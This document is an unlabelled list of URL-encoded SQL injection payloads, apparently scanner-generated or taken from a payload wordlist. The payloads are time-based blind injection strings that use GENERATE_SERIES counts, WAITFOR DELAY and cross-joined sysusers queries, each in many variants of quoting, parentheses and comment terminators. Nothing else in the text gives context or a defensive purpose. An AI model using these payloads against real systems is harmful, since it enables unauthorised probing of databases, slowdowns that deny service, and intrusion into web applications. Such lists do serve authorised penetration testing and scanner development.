foo%27%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27ofYU%27%20LIKE%20%27ofYU foo%22%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22vkzs%22%3D%22vkzs foo%22%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22qmyk%22%3D%22qmyk foo%22%29%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22DJgu%22%3D%22DJgu foo%22%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22soHP%22%3D%22soHP foo%22%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22ntxW%22%20LIKE%20%22ntxW foo%22%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22Rsyj%22%20LIKE%20%22Rsyj foo%22%29%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22ovae%22%20LIKE%20%22ovae foo%22%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22Lwxt%22%20LIKE%20%22Lwxt foo%25%27%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27oLfE%27%3D%27oLfE foo%00%27%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27zlNd%27%3D%27zlNd foo%27%29%20WHERE%207176%3D7176%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 foo%22%29%20WHERE%202001%3D2001%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 foo%29%20WHERE%206844%3D6844%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 foo%27%20WHERE%201168%3D1168%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 foo%22%20WHERE%204105%3D4105%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 foo%20WHERE%208368%3D8368%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27Jsbz%27%20FROM%20DUAL%20WHERE%208718%3D8718%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27TWtz%27%20WHERE%208243%3D8243%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20UEdD%20WHERE%209318%3D9318%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27fWUt%27%20WHERE%209948%3D9948%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%23 foo%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%29%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%29%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%29%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%25%27%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%25%27%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%25%27%29%29%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%25%27%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%00%27%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%00%27%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%20WHERE%201568%3D1568%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%29%20WHERE%202946%3D2946%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%29%20WHERE%205853%3D5853%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%20WHERE%205471%3D5471%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%20WHERE%206481%3D6481%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%20WHERE%201889%3D1889%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%7C%7C%28SELECT%20%27cmuL%27%20FROM%20DUAL%20WHERE%204642%3D4642%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%7C%7C%28SELECT%20%27zkmN%27%20WHERE%202022%3D2022%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%2B%28SELECT%20VidL%20WHERE%208516%3D8516%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%2B%28SELECT%20%27qyhf%27%20WHERE%207458%3D7458%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209911%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%25%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%25%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%25%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%25%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%00%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%00%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%20WHERE%202271%3D2271%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%20WHERE%208935%3D8935%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%20WHERE%203803%3D3803%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20WHERE%202713%3D2713%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%20WHERE%209654%3D9654%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%20WHERE%206177%3D6177%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%7C%7C%28SELECT%20%27vHYF%27%20FROM%20DUAL%20WHERE%203037%3D3037%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%7C%7C%28SELECT%20%27PRHi%27%20WHERE%201020%3D1020%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%2B%28SELECT%20qxXe%20WHERE%205864%3D5864%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%2B%28SELECT%20%27Dctd%27%20WHERE%201470%3D1470%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20IN%20BOOLEAN%20MODE%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%22%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%284010%3D4010 foo%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%287474%3D7474 foo%29%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%286272%3D6272 foo%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27kkxm%27%3D%27kkxm foo%27%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27HEiL%27%3D%27HEiL foo%27%29%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27BXCi%27%3D%27BXCi foo%27%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27miad%27%3D%27miad foo%27%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27SHzG%27%20LIKE%20%27SHzG foo%27%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27pdCx%27%20LIKE%20%27pdCx foo%27%29%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27PEZs%27%20LIKE%20%27PEZs foo%27%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27FhUt%27%20LIKE%20%27FhUt foo%22%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22sYzy%22%3D%22sYzy foo%22%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22sOqe%22%3D%22sOqe foo%22%29%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22ejNS%22%3D%22ejNS foo%22%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22disE%22%3D%22disE foo%22%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22MfrG%22%20LIKE%20%22MfrG foo%22%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22yGGn%22%20LIKE%20%22yGGn foo%22%29%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22kmZS%22%20LIKE%20%22kmZS foo%22%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22TdrT%22%20LIKE%20%22TdrT foo%25%27%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27xEMo%27%3D%27xEMo foo%00%27%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27YRSk%27%3D%27YRSk foo%27%29%20WHERE%208949%3D8949%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 foo%22%29%20WHERE%209157%3D9157%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 foo%29%20WHERE%205427%3D5427%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 foo%27%20WHERE%208815%3D8815%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 foo%22%20WHERE%203839%3D3839%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 foo%20WHERE%201937%3D1937%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 foo%27%7C%7C%28SELECT%20%27cEbb%27%20FROM%20DUAL%20WHERE%203045%3D3045%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27tMal%27%20WHERE%206428%3D6428%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20WlUF%20WHERE%203046%3D3046%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%2B%27 foo%27%2B%28SELECT%20%27ZiOH%27%20WHERE%207048%3D7048%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%207924%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%23 foo%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 